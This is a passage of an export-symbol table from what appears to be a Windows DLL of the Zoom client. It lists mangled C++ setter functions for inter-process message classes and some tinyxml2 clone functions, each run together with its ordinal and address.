              ?Set_reqID@CSBMBMessage_NotifyConfTokenResult@@QAEXABV?$CStringT@D@Cmm@@@Z56280x40c9b0
              ?Set_reqID@CSBMBMessage_RequestMyIDPToken@@QAEXABV?$CStringT@D@Cmm@@@Z56290x40c9b0
              ?Set_reqType@CSBMBMessage_AvatarDataRequest@@QAEXABI@Z56300x417560
              ?Set_reqUid@CSBMBMessage_NotifyShareFileInMeetingChat@@QAEXABV?$CStringT@_W@Cmm@@@Z56310x4181d0
              ?Set_req_id@CSBMBMessage_NotifyMeetingEmojiDownloadStatus@@QAEXABV?$CStringT@_W@Cmm@@@Z56320x40c890
              ?Set_req_type@CSBMBMessage_CCIVideoSettingsSyncFromPTRequest@@QAEXABH@Z56330x40c800
              ?Set_req_type@CSBMBMessage_CCIVideoSettingsSyncToPTRequest@@QAEXABH@Z56340x40c800
              ?Set_req_type@CSBMBMessage_MediaAPIRequest@@QAEXABI@Z56350x417560
              ?Set_requestFrom@CSBMBMessage_VTLSConfirm@@QAEXABV?$CStringT@D@Cmm@@@Z56360x41be00
              ?Set_requestFrom@CSBMBMessage_VTLSPrompt@@QAEXABV?$CStringT@D@Cmm@@@Z56370x40c9b0
              ?Set_requestID@CSBMBMessage_CancelDownloadComponent@@QAEXABV?$CStringT@_W@Cmm@@@Z56380x40c810
              ?Set_requestID@CSBMBMessage_MediaAPIRequest@@QAEXABV?$CStringT@D@Cmm@@@Z56390x40c9b0
              ?Set_requestID@CSBMBMessage_MediaAPIResponse@@QAEXABV?$CStringT@D@Cmm@@@Z56400x40c9b0
              ?Set_requestID@CSBMBMessage_StartDownloadComponent@@QAEXABV?$CStringT@_W@Cmm@@@Z56410x40c810
              ?Set_requestID@CSBMBMessage_VTLSConfirm@@QAEXABV?$CStringT@D@Cmm@@@Z56420x41be20
              ?Set_requestID@CSBMBMessage_VTLSPrompt@@QAEXABV?$CStringT@D@Cmm@@@Z56430x41a2d0
              ?Set_requestType@CSBMBMessage_CCIScreenRecordingRequest@@QAEXABH@Z56440x40c800
              ?Set_request_id@CSBMBMessage_InviteZoomPhoneTokenRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z56450x40c890
              ?Set_request_id@CSBMBMessage_PairRelationTokenRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z56460x40c890
              ?Set_response@CSBMBMessage_PS_PSResponseToTerm@@QAEXABH@Z56470x40c800
              ?Set_response_code@CSBMBMessage_MediaAPIResponse@@QAEXABI@Z56480x417560
              ?Set_response_data@CSBMBMessage_MediaAPIResponse@@QAEXABV?$CStringT@D@Cmm@@@Z56490x418380
              ?Set_response_id@CSBMBMessage_InviteZoomPhoneTokenResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z56500x40c890
              ?Set_response_id@CSBMBMessage_PairRelationTokenResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z56510x40c890
              ?Set_result@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEXABI@Z56520x40c800
              ?Set_result@CSBMBMessage_Assistant_Broadcast_Clear_All_Audio_From_Txchannel_Response@@QAEXABI@Z56530x40c800
              ?Set_result@CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Response@@QAEXABI@Z56540x40c800
              ?Set_result@CSBMBMessage_Assistant_Broadcast_Network_Audio_Stop_Proxy_Response@@QAEXABI@Z56550x40c800
              ?Set_result@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@QAEXABI@Z56560x40c800
              ?Set_result@CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Response@@QAEXABI@Z56570x40c800
              ?Set_result@CSBMBMessage_Assistant_DAL_Service_Identify_Device_Response@@QAEXABH@Z56580x419a80
              ?Set_result@CSBMBMessage_Assistant_DAL_Service_Load_Service_Response@@QAEXABH@Z56590x40c800
              ?Set_result@CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Response@@QAEXABH@Z56600x419a80
              ?Set_result@CSBMBMessage_Assistant_DAL_Service_Unload_Service_Response@@QAEXABH@Z56610x40c800
              ?Set_result@CSBMBMessage_Assistant_DAL_Service_Unset_Selected_Device_Response@@QAEXABH@Z56620x419a80
              ?Set_result@CSBMBMessage_Assistant_SIP_OnCallTransferResultNotification@@QAEXABI@Z56630x417560
              ?Set_result@CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAEXABI@Z56640x40c800
              ?Set_result@CSBMBMessage_ConfInterProcessAudioSharingServiceUnregisterResponse@@QAEXABI@Z56650x40c800
              ?Set_result@CSBMBMessage_InviteRoomSystemResult@@QAEXABH@Z56660x40c800
              ?Set_result@CSBMBMessage_NotifyCheckUpdateResponse@@QAEXABI@Z56670x418d20
              ?Set_result@CSBMBMessage_NotifyConfZRMeetingInfo@@QAEXABH@Z56680x40c800
              ?Set_result@CSBMBMessage_NotifyMeetingEmojiDownloadStatus@@QAEXABI@Z56690x419a80
              ?Set_result@CSBMBMessage_NotifySaveFileInMeetingChat@@QAEXABV?$CStringT@_W@Cmm@@@Z56700x40c890
              ?Set_result@CSBMBMessage_PairRelationTokenResponse@@QAEXABH@Z56710x417560
              ?Set_resultCode@CSBMBMessage_CCIVideoCreateEmbedWindowNotify@@QAEXABI@Z56720x417560
              ?Set_resultCode@CSBMBMessage_CCIVideoDestroyEmbedWindowNotify@@QAEXABI@Z56730x417560
              ?Set_resultCode@CSBMBMessage_CCIVideoShowEmbedWindowNotify@@QAEXABI@Z56740x417560
              ?Set_roomName@CSBMBMessage_Assistant_DAL_Service_Load_Service_Request@@QAEXABV?$CStringT@D@Cmm@@@Z56750x40c9b0
              ?Set_roomName@CSBMBMessage_Assistant_DAL_Service_Unload_Service_Request@@QAEXABV?$CStringT@D@Cmm@@@Z56760x40c9b0
              ?Set_roomUUID@CSBMBMessage_Assistant_DAL_Service_Load_Service_Request@@QAEXABV?$CStringT@D@Cmm@@@Z56770x41a2d0
              ?Set_rxChannelCounts@CSBMBMessage_Assistant_DAL_Service_Load_Service_Request@@QAEXABH@Z56780x418d00
              ?Set_rxChannelCounts@CSBMBMessage_Assistant_DAL_Service_Service_Ready_Notification@@QAEXABH@Z56790x41f220
              ?Set_sampleDepth@CSBMBMessage_Assistant_Virtual_Audio_Register_Capturer_Proxy_Response@@QAEXABI@Z56800x419ad0
              ?Set_sampleDepth@CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAEXABI@Z56810x41c6f0
              ?Set_sampleRate@CSBMBMessage_Assistant_Virtual_Audio_Register_Capturer_Proxy_Response@@QAEXABI@Z56820x419a80
              ?Set_samplesPerFrame@CSBMBMessage_Assistant_Virtual_Audio_Register_Capturer_Proxy_Response@@QAEXABI@Z56830x419aa0
              ?Set_samplesPerFrame@CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAEXABI@Z56840x4191d0
              ?Set_screenName@CSBMBMessage_NotifyConfPListChanged@@QAEXABV?$CStringT@_W@Cmm@@@Z56850x418bb0
              ?Set_secretKey@CSBMBMessage_LeaveBeforeMeetingStartNotify@@QAEXABV?$CStringT@D@Cmm@@@Z56860x41d930
              ?Set_selectNotFoundDevice@CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Request@@QAEXABH@Z56870x419a80
              ?Set_senderJID@CSBMBMessage_NotifyMeetingCallResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z56880x40c810
              ?Set_senderName@CSBMBMessage_NotifyMeetingCallResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z56890x418b80
              ?Set_serviceName@CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Request@@QAEXABV?$CStringT@D@Cmm@@@Z56900x40c9b0
              ?Set_serviceName@CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Response@@QAEXABV?$CStringT@D@Cmm@@@Z56910x418370
              ?Set_sessionID@CSBMBMessage_NotifyMeetingCallResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z56920x418b90
              ?Set_sessionId@CSBMBMessage_CheckInSessionReq@@QAEXABV?$CStringT@_W@Cmm@@@Z56930x417f10
              ?Set_sessionId@CSBMBMessage_CheckInSessionRsp@@QAEXABV?$CStringT@_W@Cmm@@@Z56940x40c810
              ?Set_sessionId@CSBMBMessage_PMCMeetChatMsgReaded@@QAEXABV?$CStringT@_W@Cmm@@@Z56950x40c890
              ?Set_sessionId@CSBMBMessage_PMCOpenTeamChatReq@@QAEXABV?$CStringT@_W@Cmm@@@Z56960x418b80
              ?Set_sessionId@CSBMBMessage_PMCOpenTeamChatRsp@@QAEXABV?$CStringT@_W@Cmm@@@Z56970x40c810
              ?Set_sessionId@CSBMBMessage_ShareMeetingChatRsp@@QAEXABV?$CStringT@_W@Cmm@@@Z56980x41b450
              ?Set_sessionName@CSBMBMessage_ShareMeetingChatRsp@@QAEXABV?$CStringT@_W@Cmm@@@Z56990x41b460
              ?Set_sessionOption@CSBMBMessage_ShareMeetingChatRsp@@QAEXABV?$CStringT@_W@Cmm@@@Z57000x421290
              ?Set_sessionType@CSBMBMessage_ShareMeetingChatRsp@@QAEXABH@Z57010x417bf0
              ?Set_sha256sum@CSBMBMessage_MeetingWallpaperStartDownload@@QAEXABV?$CStringT@_W@Cmm@@@Z57020x417f40
              ?Set_sha256sum@CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAEXABV?$CStringT@_W@Cmm@@@Z57030x417f40
              ?Set_shareAction@CSBMBMessage_ShareMeetingChatRsp@@QAEXABH@Z57040x40c800
              ?Set_shareFMName@CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z57050x418b90
              ?Set_shareResult@CSBMBMessage_ShareMeetingChatRsp@@QAEXABH@Z57060x425c20
              ?Set_sharing_role@CSBMBMessage_NotifyStartDocsShare@@QAEXABV?$CStringT@_W@Cmm@@@Z57070x417f10
              ?Set_sharing_role@CSBMBMessage_NotifyStartWhiteboardShare@@QAEXABI@Z57080x417560
              ?Set_showAvatar@CSBMBMessage_HuddlesOnShowAvatarStateChange@@QAEXABH@Z57090x40c800
              ?Set_showState@CSBMBMessage_CCIVideoShowEmbedWindowRequest@@QAEXABH@Z57100x417560
              ?Set_signalType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAEXABI@Z57110x417bf0
              ?Set_signalType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEXABI@Z57120x418e60
              ?Set_signalType@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@QAEXABI@Z57130x417bf0
              ?Set_signalType@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@QAEXABI@Z57140x418e60
              ?Set_signalType@CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Request@@QAEXABI@Z57150x41af30
              ?Set_signalType@CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Response@@QAEXABI@Z57160x41af30
              ?Set_smallUrl@CSBMBMessage_NotifyUserPropertiesChanged@@QAEXABV?$CStringT@_W@Cmm@@@Z57170x40c890
              ?Set_smapleRate@CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAEXABI@Z57180x418d20
              ?Set_source@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEXABI@Z57190x418d20
              ?Set_source@CSBMBMessage_InviteeIakRequest@@QAEXABH@Z57200x417560
              ?Set_source@CSBMBMessage_RequestUpdateAICAdminSetting@@QAEXABH@Z57210x419a80
              ?Set_sourceType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAEXABI@Z57220x419080
              ?Set_sourceType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEXABI@Z57230x4185e0
              ?Set_sourceType@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@QAEXABI@Z57240x418e60
              ?Set_sourceType@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@QAEXABI@Z57250x419080
              ?Set_speakerID@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEXABI@Z57260x417560
              ?Set_star@CSBMBMessage_VCardSetBuddyStar@@QAEXABH@Z57270x417560
              ?Set_start@CSBMBMessage_Assistant_Voice_Command_Start_Request@@QAEXABH@Z57280x40c800
              ?Set_status@CSBMBMessage_Assistant_DAL_Service_Get_Service_Status_Response@@QAEXABI@Z57290x40c800
              ?Set_status@CSBMBMessage_Assistant_Voice_Command_Status_Notification@@QAEXABH@Z57300x417bf0
              ?Set_status@CSBMBMessage_CCIVideoEndDropdownButtonClickConfirmRequest@@QAEXABV?$CStringT@D@Cmm@@@Z57310x40c9b0
              ?Set_status@CSBMBMessage_NotifyConferenceStatus@@QAEXABI@Z57320x418740
              ?Set_status@CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@QAEXABH@Z57330x419a80
              ?Set_status@CSBMBMessage_NotifyPTDeviceInfo@@QAEXABI@Z57340x417bf0
              ?Set_status@CSBMBMessage_NotifyVideoLayoutDownloadStatus@@QAEXABH@Z57350x40c800
              ?Set_str@CSBMBMessage_MeetingDiagInfo@@QAEXABV?$CStringT@D@Cmm@@@Z57360x40c9b0
              ?Set_strCallId@CSBMBMessage_StartCallOutInfo@@QAEXABV?$CStringT@_W@Cmm@@@Z57370x41af80
              ?Set_strCommand@CSBMBMessage_CCIVideoReceiveCommandNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z57380x40c890
              ?Set_strCommand@CSBMBMessage_CCIVideoSendCommandRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57390x417f10
              ?Set_strCustomerId@CSBMBMessage_CCIVideoChangeHostRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57400x40c890
              ?Set_strCustomerId@CSBMBMessage_CCIVideoSendCommandRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57410x40c890
              ?Set_strData@CSBMBMessage_CCIVideoUserDataUpdateNotify@@QAEXABV?$CStringT@D@Cmm@@@Z57420x40c9b0
              ?Set_strDefaultProfile@CSBMBMessage_OutlookOnGetDefaultProfileNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z57430x40c890
              ?Set_strEngagementId@CSBMBMessage_CCIScreenRecordingRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57440x418bb0
              ?Set_strJsCallId@CSBMBMessage_CCIScreenRecordingNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z57450x40c810
              ?Set_strJsCallId@CSBMBMessage_CCIScreenRecordingRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57460x418b80
              ?Set_strJson@CSBMBMessage_CCIVideoJoinMeetingRequest@@QAEXABV?$CStringT@D@Cmm@@@Z57470x40c9b0
              ?Set_strJsonEvents@CSBMBMessage_OutlookGetMAPICalendarEvents@@QAEXABV?$CStringT@D@Cmm@@@Z57480x40c9b0
              ?Set_strMsg@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@QAEXABV?$CStringT@_W@Cmm@@@Z57490x40c890
              ?Set_strResult@CSBMBMessage_CCIVideoWarmTransferNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z57500x40c890
              ?Set_strSessionId@CSBMBMessage_CCIScreenRecordingNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z57510x418b90
              ?Set_strSessionName@CSBMBMessage_CCIScreenRecordingNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z57520x418b80
              ?Set_strSpokenLangName@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgError@@QAEXABV?$CStringT@_W@Cmm@@@Z57530x40c810
              ?Set_strStatus@CSBMBMessage_CCIVideoHoldStatusChangeNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z57540x40c890
              ?Set_strStatus@CSBMBMessage_CCIVideoWarmTransferRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57550x40c890
              ?Set_strToken@CSBMBMessage_CCIScreenRecordingRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57560x40c810
              ?Set_strTpc@CSBMBMessage_CCIScreenRecordingRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57570x418b90
              ?Set_strTranscriptLangName@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgError@@QAEXABV?$CStringT@_W@Cmm@@@Z57580x41a5f0
              ?Set_strType@CSBMBMessage_Notify_ZPNS_MeetingStart@@QAEXABV?$CStringT@_W@Cmm@@@Z57590x40c890
              ?Set_strUserId@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@QAEXABV?$CStringT@_W@Cmm@@@Z57600x417f10
              ?Set_strUserId@CSBMBMessage_CCIVideoWarmTransferRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57610x417f10
              ?Set_strUserName@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@QAEXABV?$CStringT@_W@Cmm@@@Z57620x417f20
              ?Set_subConfType@CSBMBMessage_ConfirmConfLeave@@QAEXABI@Z57630x419c70
              ?Set_subHasError@CSBMBMessage_ConfirmConfLeave@@QAEXABH@Z57640x419c40
              ?Set_subSdkError@CSBMBMessage_ConfirmConfLeave@@QAEXABI@Z57650x419ca0
              ?Set_success@CSBMBMessage_CameraControlGroupFetched@@QAEXABH@Z57660x417560
              ?Set_success@CSBMBMessage_CameraControlGroupRemoved@@QAEXABH@Z57670x417560
              ?Set_success@CSBMBMessage_ComponentDownloadResult@@QAEXABH@Z57680x417bf0
              ?Set_success@CSBMBMessage_PSComponentDownloadResult@@QAEXABH@Z57690x417bf0
              ?Set_text@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEXABV?$CStringT@_W@Cmm@@@Z57700x418b90
              ?Set_text@CSBMBMessage_CCIVideoSetEndButtonTextRequest@@QAEXABV?$CStringT@D@Cmm@@@Z57710x40c9b0
              ?Set_threadId@CSBMBMessage_PMCOpenTeamChatReq@@QAEXABV?$CStringT@_W@Cmm@@@Z57720x418bb0
              ?Set_threadSvrTime@CSBMBMessage_PMCOpenTeamChatReq@@QAEXAB_J@Z57730x426200
              ?Set_thumbnailUrl@CSBMBMessage_NotifyShareFileInMeetingChat@@QAEXABV?$CStringT@_W@Cmm@@@Z57740x417f40
              ?Set_thumbnail_path@CSBMBMessage_SaveCustom3DAvatarToWeb@@QAEXABV?$CStringT@_W@Cmm@@@Z57750x41b460
              ?Set_thumbnail_path@CSBMBMessage_UpdateCustom3DAvatarToWeb@@QAEXABV?$CStringT@_W@Cmm@@@Z57760x41b460
              ?Set_timeStamp@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEXAB_J@Z57770x422e60
              ?Set_timeout_seconds@CSBMBMessage_MediaAPIRequest@@QAEXABI@Z57780x419a80
              ?Set_title@CSBMBMessage_Assistant_Voice_Command_UI_Update_Request@@QAEXABV?$CStringT@D@Cmm@@@Z57790x418370
              ?Set_title@CSBMBMessage_MeetingWallpaperStartDownload@@QAEXABV?$CStringT@_W@Cmm@@@Z57800x417f10
              ?Set_title@CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAEXABV?$CStringT@_W@Cmm@@@Z57810x417f10
              ?Set_tmServerside@CSBMBMessage_NotifyMeetingCallResponse@@QAEXAB_J@Z57820x422e60
              ?Set_to_WindowId@CSBMBMessage_CCIVideoEmbedWindowSendMsgRequest@@QAEXABV?$CStringT@D@Cmm@@@Z57830x41a2d0
              ?Set_to_WindowId@CSBMBMessage_CCIVideoOnEmbedWindowSendMsgRequest@@QAEXABV?$CStringT@D@Cmm@@@Z57840x41a2d0
              ?Set_toggle@CSBMBMessage_MeetingPAAPToggleEvent@@QAEXABH@Z57850x417560
              ?Set_token@CSBMBMessage_CompanionTokenResponse@@QAEXABV?$CStringT@D@Cmm@@@Z57860x41bc80
              ?Set_token@CSBMBMessage_InviteZoomPhoneTokenResponse@@QAEXABV?$CStringT@D@Cmm@@@Z57870x41a2d0
              ?Set_token@CSBMBMessage_PairRelationTokenResponse@@QAEXABV?$CStringT@D@Cmm@@@Z57880x418380
              ?Set_top@CSBMBMessage_PMCOpenTeamChatReq@@QAEXABH@Z57890x426250
              ?Set_trackingId@CSBMBMessage_LeaveBeforeMeetingStartNotify@@QAEXABV?$CStringT@D@Cmm@@@Z57900x420a00
              ?Set_txChannelCounts@CSBMBMessage_Assistant_DAL_Service_Load_Service_Request@@QAEXABH@Z57910x418d20
              ?Set_txChannelCounts@CSBMBMessage_Assistant_DAL_Service_Service_Ready_Notification@@QAEXABH@Z57920x41f240
              ?Set_txChannelID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAEXABH@Z57930x418e60
              ?Set_txChannelID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEXABH@Z57940x419080
              ?Set_txChannelID@CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Request@@QAEXABH@Z57950x40c800
              ?Set_txChannelID@CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Response@@QAEXABH@Z57960x417bf0
              ?Set_type@CSBMBMessage_Assistant_Voice_Command_Data_Request@@QAEXABH@Z57970x40c800
              ?Set_type@CSBMBMessage_Assistant_Voice_Command_Data_Response@@QAEXABH@Z57980x40c800
              ?Set_type@CSBMBMessage_Assistant_Voice_Command_Status_Notification@@QAEXABH@Z57990x40c800
              ?Set_type@CSBMBMessage_Assistant_Voice_Command_UI_Update_Request@@QAEXABH@Z58000x40c800
              ?Set_type@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEXABI@Z58010x422e80
              ?Set_type@CSBMBMessage_CCIVideoSetEndButtonTextRequest@@QAEXABV?$CStringT@D@Cmm@@@Z58020x41a2d0
              ?Set_type@CSBMBMessage_NotifyCustom3DAvatarFileIdUpdated@@QAEXABH@Z58030x40c800
              ?Set_type@CSBMBMessage_NotifyMeetingCustom3DAvatarElementThumbnailDownloaded@@QAEXABH@Z58040x40c800
              ?Set_type@CSBMBMessage_NotifyMeetingFaceMakeupDownloaded@@QAEXABH@Z58050x40c800
              ?Set_type@CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@QAEXABH@Z58060x417560
              ?Set_type@CSBMBMessage_NotifyPTDeviceInfo@@QAEXABI@Z58070x40c800
              ?Set_type@CSBMBMessage_NotifyShareFileInMeetingChat@@QAEXABV?$CStringT@_W@Cmm@@@Z58080x418170
              ?Set_type@CSBMBMessage_PS_UpdateAccountInfo@@QAEXABH@Z58090x40c800
              ?Set_type@CSBMBMessage_PS_UpdateKeyValueInfo@@QAEXABH@Z58100x40c800
              ?Set_type@CSBMBMessage_RemoveCustom3DAvatarToWeb@@QAEXABH@Z58110x40c800
              ?Set_type@CSBMBMessage_SaveCustom3DAvatarToWeb@@QAEXABH@Z58120x40c800
              ?Set_type@CSBMBMessage_TrackingPAAPEvent@@QAEXABH@Z58130x417560
              ?Set_type@CSBMBMessage_UpdateCustom3DAvatarToWeb@@QAEXABH@Z58140x40c800
              ?Set_url@CSBMBMessage_CCIVideoOpenURLWithDefaultBrowser@@QAEXABV?$CStringT@D@Cmm@@@Z58150x40c9b0
              ?Set_url@CSBMBMessage_MeetingWallpaperStartDownload@@QAEXABV?$CStringT@_W@Cmm@@@Z58160x417f20
              ?Set_url@CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAEXABV?$CStringT@_W@Cmm@@@Z58170x417f20
              ?Set_url@CSBMBMessage_NotifyMeetingImageDownloaded@@QAEXABV?$CStringT@_W@Cmm@@@Z58180x40c890
              ?Set_url@CSBMBMessage_RequestMyIDPToken@@QAEXABV?$CStringT@_W@Cmm@@@Z58190x417f20
              ?Set_url@CSBMBMessage_ZoomInternalNavigateURLEvent@@QAEXABV?$CStringT@_W@Cmm@@@Z58200x40c890
              ?Set_userData@CSBMBMessage_NotifyMeetingImageDownloaded@@QAEXABH@Z58210x41aef0
              ?Set_userDeviceID@CSBMBMessage_NotifyConfPListChanged@@QAEXABV?$CStringT@_W@Cmm@@@Z58220x418b90
              ?Set_userEmail@CSBMBMessage_NotifyPTCleanIDPToken@@QAEXABV?$CStringT@_W@Cmm@@@Z58230x417f10
              ?Set_userEmail@CSBMBMessage_RequestMyIDPToken@@QAEXABV?$CStringT@_W@Cmm@@@Z58240x418170
              ?Set_userFBID@CSBMBMessage_NotifyConfPListChanged@@QAEXABV?$CStringT@_W@Cmm@@@Z58250x418b80
              ?Set_userFMName@CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z58260x418b80
              ?Set_userID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAEXABH@Z58270x40c800
              ?Set_userID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEXABH@Z58280x417bf0
              ?Set_userID@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@QAEXABH@Z58290x40c800
              ?Set_userID@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@QAEXABH@Z58300x417bf0
              ?Set_userID@CSBMBMessage_NotifyPTCleanIDPToken@@QAEXABV?$CStringT@_W@Cmm@@@Z58310x40c890
              ?Set_userID@CSBMBMessage_RequestMyIDPToken@@QAEXABV?$CStringT@_W@Cmm@@@Z58320x418140
              ?Set_userId@CSBMBMessage_CCIVideoAssignAndNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z58330x40c890
              ?Set_userName@CSBMBMessage_LeaveBeforeMeetingStartNotify@@QAEXABV?$CStringT@D@Cmm@@@Z58340x41d7e0
              ?Set_userZoomID@CSBMBMessage_UserInTrustListInfo@@QAEXABV?$CStringT@D@Cmm@@@Z58350x40c9b0
              ?Set_user_guid@CSBMBMessage_ConfGetZRMeetingInfoReq@@QAEXABV?$CStringT@_W@Cmm@@@Z58360x40c890
              ?Set_user_input@CSBMBMessage_ConfirmRecaptcha@@QAEXABV?$CStringT@_W@Cmm@@@Z58370x40c890
              ?Set_user_zoom_id@CSBMBMessage_VCardDataRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z58380x40c890
              ?Set_user_zoom_id@CSBMBMessage_VCardFetchManagerInfo@@QAEXABV?$CStringT@_W@Cmm@@@Z58390x40c890
              ?Set_user_zoom_id@CSBMBMessage_VCardSetBuddyStar@@QAEXABV?$CStringT@_W@Cmm@@@Z58400x40c890
              ?Set_value@CSBMBMessage_MeshNotification@@QAEXABV?$CStringT@D@Cmm@@@Z58410x418370
              ?Set_value@CSBMBMessage_PS_UpdateKeyValueInfo@@QAEXABV?$CStringT@_W@Cmm@@@Z58420x418b80
              ?Set_value@CSBMBMessage_RequestUpdateAICAdminSetting@@QAEXABH@Z58430x417560
              ?Set_videoEvent@CSBMBMessage_CCIVideoEventReportNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z58440x40c890
              ?Set_wParam@CSBMBMessage_InviteWinStatus@@QAEXABI@Z58450x418e60
              ?Set_wallpaper_id@CSBMBMessage_MeetingWallpaperStartDownload@@QAEXABV?$CStringT@_W@Cmm@@@Z58460x40c890
              ?Set_wallpaper_id@CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAEXABV?$CStringT@_W@Cmm@@@Z58470x40c890
              ?Set_wallpaper_id@CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@QAEXABV?$CStringT@_W@Cmm@@@Z58480x40c890
              ?Set_webClientUrl@CSBMBMessage_LeaveConfErrorDesc@@QAEXABV?$CStringT@_W@Cmm@@@Z58490x418bb0
              ?Set_web_record_info@CSBMBMessage_PS_PSAsyncRecordingUploadResult@@QAEXABV?$CStringT@_W@Cmm@@@Z58500x418b80
              ?Set_web_record_info@CSBMBMessage_PS_PTReturnAsyncRecordingActionToken@@QAEXABV?$CStringT@_W@Cmm@@@Z58510x40c810
              ?Set_whiteboardUrlRegular@CSBMBMessage_NotifyPTLoginInfo@@QAEXABV?$CStringT@D@Cmm@@@Z58520x41a180
              ?Set_width@CSBMBMessage_PMCOpenTeamChatReq@@QAEXABH@Z58530x426280
              ?Set_windowId@CSBMBMessage_CCIVideoCreateEmbedWindowNotify@@QAEXABV?$CStringT@D@Cmm@@@Z58540x418380
              ?Set_windowId@CSBMBMessage_CCIVideoDestroyEmbedWindowNotify@@QAEXABV?$CStringT@D@Cmm@@@Z58550x418380
              ?Set_windowId@CSBMBMessage_CCIVideoShowEmbedWindowNotify@@QAEXABV?$CStringT@D@Cmm@@@Z58560x418380
              ?Set_workflowUrlRegualr@CSBMBMessage_NotifyPTLoginInfo@@QAEXABV?$CStringT@_W@Cmm@@@Z58570x41a150
              ?Set_workvivoDomain@CSBMBMessage_NotifyPTLoginInfo@@QAEXABV?$CStringT@D@Cmm@@@Z58580x41a0c0
              ?Set_zoomDocsUrlRegular@CSBMBMessage_NotifyPTLoginInfo@@QAEXABV?$CStringT@_W@Cmm@@@Z58590x41a120
              ?Set_zr_userid@CSBMBMessage_NotifyConfZRMeetingInfo@@QAEXABH@Z58600x417bf0
              ?ShallowClone@XMLComment@tinyxml2@@UBEPAVXMLNode@2@PAVXMLDocument@2@@Z58610x460c80
              ?ShallowClone@XMLDeclaration@tinyxml2@@UBEPAVXMLNode@2@PAVXMLDocument@2@@Z58620x460d80
              ?ShallowClone@XMLDocument@tinyxml2@@UBEPAVXMLNode@2@PAV12@@Z58630x454b60
              ?ShallowClone@XMLElement@tinyxml2@@UBEPAVXMLNode@2@PAVXMLDocument@2@@Z58640x462000
              ?ShallowClone@XMLText@tinyxml2@@UBEPAVXMLNode@2@PAVXMLDocument@2@@Z58650x460b70
              ?ShallowClone@XMLUnknown@tinyxml2@@UBEPAVXMLNode@2@PAVXMLDocument@2@@Z58660x460e80
